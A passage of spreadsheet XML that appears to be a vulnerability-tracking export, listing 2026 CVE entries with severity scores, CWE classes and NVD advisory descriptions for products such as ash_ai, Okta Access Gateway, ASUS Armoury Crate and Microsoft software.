Ash field policies redact forbidden fields on returned records (replacing them with %Ash.ForbiddenField{}), but that redaction does not apply to aggregate values. A script could therefore read a field the calling actor's field policies forbid by requesting it as an aggregate instead of as a field. This includes fields that are public? true but restricted per-actor by a field policy, such as sensitive PII. The prior hardening only enforced the exposed-field allow-list (field visibility), which is a separate axis from per-actor field-policy authorization.

The fix authorizes the aggregated field against the resource's field policies, so aggregating over a field the actor may not see is refused or scoped to the rows where it is visible.

This issue affects ash_lua: from 0.1.0 before 0.2.2.</t></is></c><c r="T1197" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78216</t></is></c></row><row r="1198"><c r="A1198" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1198" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1198" s="5" t="inlineStr"><is><t>CVE-2026-78230</t></is></c><c r="D1198" s="5" t="n"><v>6</v></c><c r="E1198" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1198" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1198" s="5" t="inlineStr" /><c r="H1198" s="5" t="n"><v>0.002</v></c><c r="I1198" s="5" t="inlineStr" /><c r="J1198" s="5" t="inlineStr" /><c r="K1198" s="5" t="inlineStr" /><c r="L1198" s="5" t="inlineStr" /><c r="M1198" s="5" t="inlineStr" /><c r="N1198" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1198" s="5" t="inlineStr" /><c r="R1198" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S1198" s="5" t="inlineStr"><is><t>AshAi exposes Ash read actions to language-model tool calls. The read tool accepts an aggregate result type (min, max, sum, avg) that builds an ad-hoc Ash.Query.Aggregate over a named field and returns its raw value.

Ash field policies redact forbidden fields on returned records (replacing them with %Ash.ForbiddenField{}), but that redaction does not apply to aggregate values. A tool caller could therefore read a field the calling actor's field policies forbid by requesting it as an aggregate; min/max in particular return an actual field value. This includes fields that are public? true but restricted per-actor by a field policy, such as sensitive PII. The tool's existing check only required the field to be public, which is a separate axis from per-actor field-policy authorization.

The fix authorizes the aggregated field against the resource's field policies, so aggregating over a field the actor may not see is refused or scoped to the rows where it is visible.

This issue affects ash_ai: from 0.1.0 before 1.0.3.</t></is></c><c r="T1198" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78230</t></is></c></row><row r="1199"><c r="A1199" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1199" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1199" s="5" t="inlineStr"><is><t>CVE-2026-78552</t></is></c><c r="D1199" s="5" t="n"><v>6</v></c><c r="E1199" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1199" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1199" s="5" t="inlineStr" /><c r="H1199" s="5" t="n"><v>0.003</v></c><c r="I1199" s="5" t="inlineStr" /><c r="J1199" s="5" t="inlineStr"><is><t>nginx, okta</t></is></c><c r="K1199" s="5" t="inlineStr" /><c r="L1199" s="5" t="inlineStr" /><c r="M1199" s="5" t="inlineStr" /><c r="N1199" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1199" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1199" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1199" s="5" t="inlineStr" /><c r="R1199" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1199" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not apply its Lua directive restriction to the application-level custom configuration field. The field is interpolated directly into the nginx server block without inspection, resulting in execution of injected directives.</t></is></c><c r="T1199" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78552</t></is></c></row><row r="1200"><c r="A1200" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1200" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1200" s="5" t="inlineStr"><is><t>CVE-2026-78622</t></is></c><c r="D1200" s="5" t="n"><v>6</v></c><c r="E1200" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1200" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1200" s="5" t="inlineStr" /><c r="H1200" s="5" t="n"><v>0.001</v></c><c r="I1200" s="5" t="inlineStr" /><c r="J1200" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1200" s="5" t="inlineStr" /><c r="L1200" s="5" t="inlineStr" /><c r="M1200" s="5" t="inlineStr" /><c r="N1200" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1200" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1200" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1200" s="5" t="inlineStr" /><c r="R1200" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1200" s="5" t="inlineStr"><is><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is></c><c r="T1200" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78622</t></is></c></row><row r="1201"><c r="A1201" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1201" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1201" s="5" t="inlineStr"><is><t>CVE-2026-82056</t></is></c><c r="D1201" s="5" t="n"><v>6</v></c><c r="E1201" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1201" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1201" s="5" t="inlineStr" /><c r="H1201" s="5" t="n"><v>0.002</v></c><c r="I1201" s="5" t="inlineStr" /><c r="J1201" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1201" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1201" s="5" t="inlineStr" /><c r="M1201" s="5" t="inlineStr" /><c r="N1201" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1201" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1201" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1201" s="5" t="inlineStr" /><c r="R1201" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1201" s="5" t="inlineStr"><is><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is></c><c r="T1201" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82056</t></is></c></row><row r="1202"><c r="A1202" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1202" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1202" s="5" t="inlineStr"><is><t>CVE-2026-82063</t></is></c><c r="D1202" s="5" t="n"><v>6</v></c><c r="E1202" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1202" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1202" s="5" t="inlineStr" /><c r="H1202" s="5" t="n"><v>0.003</v></c><c r="I1202" s="5" t="inlineStr" /><c r="J1202" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1202" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1202" s="5" t="inlineStr" /><c r="M1202" s="5" t="inlineStr" /><c r="N1202" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1202" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1202" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1202" s="5" t="inlineStr" /><c r="R1202" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1202" s="5" t="inlineStr"><is><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is></c><c r="T1202" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82063</t></is></c></row><row r="1203"><c r="A1203" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1203" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1203" s="5" t="inlineStr"><is><t>CVE-2026-16004</t></is></c><c r="D1203" s="5" t="n"><v>5.9</v></c><c r="E1203" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1203" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1203" s="5" t="inlineStr" /><c r="H1203" s="5" t="n"><v>0.001</v></c><c r="I1203" s="5" t="inlineStr" /><c r="J1203" s="5" t="inlineStr" /><c r="K1203" s="5" t="inlineStr" /><c r="L1203" s="5" t="inlineStr" /><c r="M1203" s="5" t="inlineStr" /><c r="N1203" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1203" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1203" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1203" s="5" t="inlineStr" /><c r="R1203" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="S1203" s="5" t="inlineStr"><is><t>Exposed IOCTL with Insufficient Access Control in Armoury Crate driver allows a local user to read and write arbitrary PCI/PCIe configuration space via crafted IOCTL requests by bypassing the driver's verification.
Refer to the '
Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1203" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16004</t></is></c></row><row r="1204"><c r="A1204" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1204" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1204" s="5" t="inlineStr"><is><t>CVE-2026-69304</t></is></c><c r="D1204" s="5" t="n"><v>5.9</v></c><c r="E1204" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1204" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1204" s="5" t="inlineStr" /><c r="H1204" s="5" t="n"><v>0.008</v></c><c r="I1204" s="5" t="inlineStr" /><c r="J1204" s="5" t="inlineStr" /><c r="K1204" s="5" t="inlineStr" /><c r="L1204" s="5" t="inlineStr" /><c r="M1204" s="5" t="inlineStr" /><c r="N1204" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1204" s="5" t="inlineStr" /><c r="R1204" s="5" t="inlineStr"><is><t>CWE-409</t></is></c><c r="S1204" s="5" t="inlineStr"><is><t>Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1204" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69304</t></is></c></row><row r="1205"><c r="A1205" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1205" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1205" s="5" t="inlineStr"><is><t>CVE-2026-69382</t></is></c><c r="D1205" s="5" t="n"><v>5.9</v></c><c r="E1205" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1205" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1205" s="5" t="inlineStr" /><c r="H1205" s="5" t="n"><v>0.004</v></c><c r="I1205" s="5" t="inlineStr" /><c r="J1205" s="5" t="inlineStr" /><c r="K1205" s="5" t="inlineStr" /><c r="L1205" s="5" t="inlineStr" /><c r="M1205" s="5" t="inlineStr" /><c r="N1205" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1205" s="5" t="inlineStr" /><c r="R1205" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="S1205" s="5" t="inlineStr"><is><t>Use of a broken or risky cryptographic algorithm in Microsoft Exchange Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1205" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69382</t></is></c></row><row r="1206"><c r="A1206" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1206" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1206" s="5" t="inlineStr"><is><t>CVE-2026-70091</t></is></c><c r="D1206" s="5" t="n"><v>5.9</v></c><c r="E1206" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1206" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1206" s="5" t="inlineStr" /><c r="H1206" s="5" t="n"><v>0.007</v></c><c r="I1206" s="5" t="inlineStr" /><c r="J1206" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1206" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1206" s="5" t="inlineStr" /><c r="M1206" s="5" t="inlineStr" /><c r="N1206" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1206" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1206" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1206" s="5" t="inlineStr" /><c r="R1206" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S1206" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1206" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70091</t></is></c></row><row r="1207"><c r="A1207" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1207" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1207" s="5" t="inlineStr"><is><t>CVE-2026-72978</t></is></c><c r="D1207" s="5" t="n"><v>5.9</v></c><c r="E1207" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1207" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1207" s="5" t="inlineStr" /><c r="H1207" s="5" t="n"><v>0.008</v></c><c r="I1207" s="5" t="inlineStr" /><c r="J1207" s="5" t="inlineStr" /><c r="K1207" s="5" t="inlineStr" /><c r="L1207" s="5" t="inlineStr" /><c r="M1207" s="5" t="inlineStr" /><c r="N1207" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1207" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1207" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1207" s="5" t="inlineStr" /><c r="R1207" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1207" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in Active Directory Federation Services (AD FS) allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1207" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72978</t></is></c></row><row r="1208"><c r="A1208" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1208" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1208" s="5" t="inlineStr"><is><t>CVE-2026-73310</t></is></c><c r="D1208" s="5" t="n"><v>5.9</v></c><c r="E1208" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1208" s="5" t="inlineStr" /><c r="H1208" s="5" t="n"><v>0.004</v></c><c r="I1208" s="5" t="inlineStr" /><c r="J1208" s="5" t="inlineStr" /><c r="K1208" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1208" s="5" t="inlineStr" /><c r="M1208" s="5" t="inlineStr" /><c r="N1208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1208" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1208" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1208" s="5" t="inlineStr" /><c r="R1208" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1208" s="5" t="inlineStr"><is><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is></c><c r="T1208" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73310</t></is></c></row><row r="1209"><c r="A1209" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1209" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1209" s="5" t="inlineStr"><is><t>CVE-2026-75809</t></is></c><c r="D1209" s="5" t="n"><v>5.9</v></c><c r="E1209" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1209" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1209" s="5" t="inlineStr" /><c r="H1209" s="5" t="n"><v>0.001</v></c><c r="I1209" s="5" t="inlineStr" /><c r="J1209" s="5" t="inlineStr" /><c r="K1209" s="5" t="inlineStr" /><c r="L1209" s="5" t="inlineStr" /><c r="M1209" s="5" t="inlineStr" /><c r="N1209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1209" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1209" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1209" s="5" t="inlineStr" /><c r="R1209" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="S1209" s="5" t="inlineStr"><is><t>Exposed IOCTL with insufficient access control in ASUS Armoury Crate allows a local user to disclosure information and disabling device functionality by bypassing driver authentication and using IOCTLs to read from and write to PCIe configuration space.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1209" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75809</t></is></c></row><row r="1210"><c r="A1210" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1210" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1210" s="5" t="inlineStr"><is><t>CVE-2026-78620</t></is></c><c r="D1210" s="5" t="n"><v>5.9</v></c><c r="E1210" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1210" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1210" s="5" t="inlineStr" /><c r="H1210" s="5" t="n"><v>0.003</v></c><c r="I1210" s="5" t="inlineStr" /><c r="J1210" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1210" s="5" t="inlineStr" /><c r="L1210" s="5" t="inlineStr" /><c r="M1210" s="5" t="inlineStr" /><c r="N1210" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1210" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1210" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1210" s="5" t="inlineStr" /><c r="R1210" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S1210" s="5" t="inlineStr"><is><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is></c><c r="T1210" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78620</t></is></c></row><row r="1211"><c r="A1211" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1211" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1211" s="5" t="inlineStr"><is><t>CVE-2026-16005</t></is></c><c r="D1211" s="5" t="n"><v>5.8</v></c><c r="E1211" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1211" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1211" s="5" t="inlineStr" /><c r="H1211" s="5" t="n"><v>0.001</v></c><c r="I1211" s="5" t="inlineStr" /><c r="J1211" s="5" t="inlineStr" /><c r="K1211" s="5" t="inlineStr" /><c r="L1211" s="5" t="inlineStr" /><c r="M1211" s="5" t="inlineStr" /><c r="N1211" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1211" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1211" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1211" s="5" t="inlineStr" /><c r="R1211" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="S1211" s="5" t="inlineStr"><is><t>Release of Invalid Pointer or Reference in Armoury Crate driver allows a local user to free arbitrary memory via a crafted IOCTL request by bypassing the driver's verification, which can corrupt data structures and cause a system crash (BSOD).Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1211" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16005</t></is></c></row><row r="1212"><c r="A1212" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1212" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1212" s="5" t="inlineStr"><is><t>CVE-2026-69559</t></is></c><c r="D1212" s="5" t="n"><v>5.8</v></c><c r="E1212" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1212" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1212" s="5" t="inlineStr" /><c r="H1212" s="5" t="n"><v>0.003</v></c><c r="I1212" s="5" t="inlineStr" /><c r="J1212" s="5" t="inlineStr" /><c r="K1212" s="5" t="inlineStr" /><c r="L1212" s="5" t="inlineStr" /><c r="M1212" s="5" t="inlineStr" /><c r="N1212" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1212" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1212" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1212" s="5" t="inlineStr" /><c r="R1212" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S1212" s="5" t="inlineStr"><is><t>Origin validation error in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1212" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69559</t></is></c></row><row r="1213"><c r="A1213" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1213" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1213" s="5" t="inlineStr"><is><t>CVE-2026-75811</t></is></c><c r="D1213" s="5" t="n"><v>5.8</v></c><c r="E1213" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1213" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1213" s="5" t="inlineStr" /><c r="H1213" s="5" t="n"><v>0.001</v></c><c r="I1213" s="5" t="inlineStr" /><c r="J1213" s="5" t="inlineStr" /><c r="K1213" s="5" t="inlineStr" /><c r="L1213" s="5" t="inlineStr" /><c r="M1213" s="5" t="inlineStr" /><c r="N1213" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1213" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1213" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1213" s="5" t="inlineStr" /><c r="R1213" s="5" t="inlineStr"><is><t>CWE-1256</t></is></c><c r="S1213" s="5" t="inlineStr"><is><t>Improper Restriction of Software Interfaces to Hardware Features in ASUS Armoury Crate allows a local user to modify hardware configuration settings and potentially cause hardware damage by bypassing driver authentication and accessing critical model-specific registers.Refer to the '
Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1213" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75811</t></is></c></row><row r="1214"><c r="A1214" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1214" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1214" s="5" t="inlineStr"><is><t>CVE-2026-16006</t></is></c><c r="D1214" s="5" t="n"><v>5.7</v></c><c r="E1214" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1214" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1214" s="5" t="inlineStr" /><c r="H1214" s="5" t="n"><v>0.001</v></c><c r="I1214" s="5" t="inlineStr" /><c r="J1214" s="5" t="inlineStr" /><c r="K1214" s="5" t="inlineStr" /><c r="L1214" s="5" t="inlineStr" /><c r="M1214" s="5" t="inlineStr" /><c r="N1214" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1214" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1214" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1214" s="5" t="inlineStr" /><c r="R1214" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1214" s="5" t="inlineStr"><is><t>Exposure of Sensitive System Information to an Unauthorized Control Sphere in Armoury Crate driver allows a local user to obtain kernel virtual addresses via a crafted IOCTL request by bypassing the driver's verification, potentially providing further insight into the kernel memory layout.Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1214" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16006</t></is></c></row><row r="1215"><c r="A1215" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1215" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1215" s="5" t="inlineStr"><is><t>CVE-2026-18023</t></is></c><c r="D1215" s="5" t="n"><v>5.7</v></c><c r="E1215" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1215" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1215" s="5" t="inlineStr" /><c r="H1215" s="5" t="n"><v>0.001</v></c><c r="I1215" s="5" t="inlineStr" /><c r="J1215" s="5" t="inlineStr" /><c r="K1215" s="5" t="inlineStr" /><c r="L1215" s="5" t="inlineStr" /><c r="M1215" s="5" t="inlineStr" /><c r="N1215" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1215" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1215" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1215" s="5" t="inlineStr" /><c r="R1215" s="5" t="inlineStr"><is><t>CWE-226</t></is></c><c r="S1215" s="5" t="inlineStr"><is><t>Sensitive Information in Resource Not Removed Before Reuse in ASUS Armoury Crate driver allows a local user to disclose sensitive information from uninitialized memory via a crafted IOCTL request that bypasses the driver's security verification mechanism.
Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1215" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18023</t></is></c></row><row r="1216"><c r="A1216" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1216" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1216" s="5" t="inlineStr"><is><t>CVE-2026-68874</t></is></c><c r="D1216" s="5" t="n"><v>5.7</v></c><c r="E1216" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1216" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1216" s="5" t="inlineStr" /><c r="H1216" s="5" t="n"><v>0.008</v></c><c r="I1216" s="5" t="inlineStr" /><c r="J1216" s="5" t="inlineStr" /><c r="K1216" s="5" t="inlineStr" /><c r="L1216" s="5" t="inlineStr" /><c r="M1216" s="5" t="inlineStr" /><c r="N1216" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1216" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1216" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1216" s="5" t="inlineStr" /><c r="R1216" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1216" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1216" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68874</t></is></c></row><row r="1217"><c r="A1217" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1217" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1217" s="5" t="inlineStr"><is><t>CVE-2026-69317</t></is></c><c r="D1217" s="5" t="n"><v>5.7</v></c><c r="E1217" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1217" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1217" s="5" t="inlineStr" /><c r="H1217" s="5" t="n"><v>0.008</v></c><c r="I1217" s="5" t="inlineStr" /><c r="J1217" s="5" t="inlineStr" /><c r="K1217" s="5" t="inlineStr" /><c r="L1217" s="5" t="inlineStr" /><c r="M1217" s="5" t="inlineStr" /><c r="N1217" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1217" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1217" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1217" s="5" t="inlineStr" /><c r="R1217" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1217" s="5" t="inlineStr"><is><t>Out-of-bounds read in Remote Desktop Client allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1217" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69317</t></is></c></row><row r="1218"><c r="A1218" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1218" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1218" s="5" t="inlineStr"><is><t>CVE-2026-69349</t></is></c><c r="D1218" s="5" t="n"><v>5.7</v></c><c r="E1218" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1218" 